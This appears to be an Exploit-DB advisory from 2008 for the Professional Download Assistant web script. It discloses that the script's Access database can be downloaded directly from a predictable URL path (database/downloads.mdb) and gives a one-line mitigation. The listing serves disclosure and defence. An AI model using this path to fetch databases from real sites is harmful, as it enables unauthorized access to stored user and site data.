Professional Download Assistant (downloads.mdb) Database Disclosure Vulnerability

vendor:

Professional Download Assistant

by:

Ghost Hacker

7.5

CVSS

HIGH

Database Disclosure

N/A

CWE

Product Name: Professional Download Assistant

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Professional Download Assistant (downloads.mdb) Database Disclosure Vulnerability

An attacker can access the database of Professional Download Assistant by accessing the URL http://xxxx.com/[path]/database/downloads.mdb.

Mitigation:

Restrict access to the database file downloads.mdb.

Source

Exploit-DB raw data:

####################################################################################################
# Professional Download Assistant (downloads.mdb) Database Disclosure Vulnerability                #
# Â© Ghost Hacker - REAL-H.COM                                                                      #
####################################################################################################
#[~] Author : Ghost Hacker                                                                         #
#[~] Homepage : http://Real-h.com                                                                  #
#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com                                                    #
#[~] Bug : Database Disclosure                                                                     #
#[~] Name Script : Professional Download Assistant                                                 #
#[~] Download : http://www.dotnetindex.com/downloads/easy_download_getinfo.asp?id=8                #
####################################################################################################
#[~]Exploit                                                                                        #
# http://xxxx.com/[path]/database/downloads.mdb                                                    #
##################################### ###############################################################
#[~]Greets :                                                                                       #
# Mr.SaFa7 [v4-team.com] , All Members Real-h.com and v4-team.net , All My Friends (3ed mobark)    #
####################################################################################################

# milw0rm.com [2008-12-07]